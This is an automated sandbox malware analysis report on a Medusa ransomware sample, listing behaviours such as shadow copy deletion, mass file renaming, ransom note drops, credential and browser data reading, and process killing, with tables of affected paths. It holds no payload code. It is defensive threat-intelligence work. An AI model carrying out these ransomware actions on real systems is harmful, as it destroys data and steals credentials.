Malware Analysis Report

2024-12-07 17:08

Sample ID 241002-ngp6zaxdlb
Target 20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike
SHA256 91a3b832564a9b29685b393c8bda9925a7da87fd3958625980da06f80f76109d
Tags
medusaransomware defense_evasion discovery execution impact ransomware spyware stealer credential_access persistence
score
10/10

Analysis Overview

score
10/10

SHA256

91a3b832564a9b29685b393c8bda9925a7da87fd3958625980da06f80f76109d

Threat Level: Known bad

The file 20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike was found to be: Known bad.

Malicious Activity Summary

Medusa Ransomware

Renames multiple (11170) files with added filename extension

Renames multiple (8807) files with added filename extension

Deletes shadow copies

Boot or Logon Autostart Execution: Active Setup

Credentials from Password Stores: Windows Credential Manager

Reads user/profile data of web browsers

Drops startup file

Drops desktop.ini file(s)

Enumerates connected drives

Network Share Discovery

Drops file in Program Files directory

Unsigned PE

Browser Information Discovery

Program crash

System Location Discovery: System Language Discovery

System Network Configuration Discovery: Internet Connection Discovery

Runs net.exe

Suspicious use of FindShellTrayWindow

Kills process with taskkill

Suspicious use of SendNotifyMessage

Interacts with shadow copies

Suspicious use of AdjustPrivilegeToken

Runs ping.exe

Modifies registry class

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy service COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-02 11:22

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-02 11:22

Reported

2024-10-02 11:25

Platform

win7-20240903-en

Max time kernel

145s

Max time network

128s

Command Line

"C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe"

Signatures

Medusa Ransomware

ransomware medusaransomware

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (11170) files with added filename extension

ransomware

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Chess\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Purble Place\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\EHDN25ED\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\X9WSUL7T\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\YFS4OGJW\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-457978338-2990298471-2379561640-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\TL381H8Y\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Microsoft Games\FreeCell\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Mahjong\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Ringtones\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\GRU3FPRK\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\$Recycle.Bin\S-1-5-21-457978338-2990298471-2379561640-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MX1BY2FD\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Solitaire\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OBDG6J46\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RYYHNCRR\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Hearts\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Windows\SysWOW64\vssadmin.exe N/A

Network Share Discovery

discovery

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher.nl_ja_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\it\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color48.jpg C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\de-DE\js\weather.js C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-sendopts.xml C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\audio_output\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\settings.html C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\1033\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.conf C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\css\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\UserControl.zip C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\it-IT\slideShow.html C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightOrange\TAB_ON.GIF C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\AWARDHM.POC C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rssLogo.gif C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CNFRES.CFG C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GrayCheck\TAB_OFF.GIF C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SpringGreen.css C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\XLICONS.EXE C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\be.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_divider_right.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\PROPLUS\ProPlusWW.XML C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\system_s.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\de-DE\RSSFeeds.html C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\prev_rest.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Kaliningrad C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\ja-JP\js\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02228_.WMF C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Web Server Extensions\14\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0157763.WMF C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Maroon.css C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME41.CSS C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\hy.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\mailapi.jar C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\gadget.xml C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\msadc\en-US\msadcor.dll.mui C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_browse.html C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\4.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01039_.WMF C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\en-US\css\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-crescent_partly-cloudy.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\Filters.xml C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.ibm.icu_52.1.0.v201404241930.jar C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\org-openide-modules.jar C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Purble Place\en-US\PurblePlace.exe.mui C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-execution.jar C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MSTORES.DLL C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Azores C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsPreviewTemplate.html C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_LOOP_BG_PAL.wmv C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationUp_SelectionSubpicture.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File created C:\Program Files\Java\jre7\lib\zi\Pacific\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00512_.WMF C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\eBook.api C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ECHO\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0198494.WMF C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR5B.GIF C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\square_m.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File created C:\Program Files\Common Files\Microsoft Shared\ink\sv-SE\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\vssadmin.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
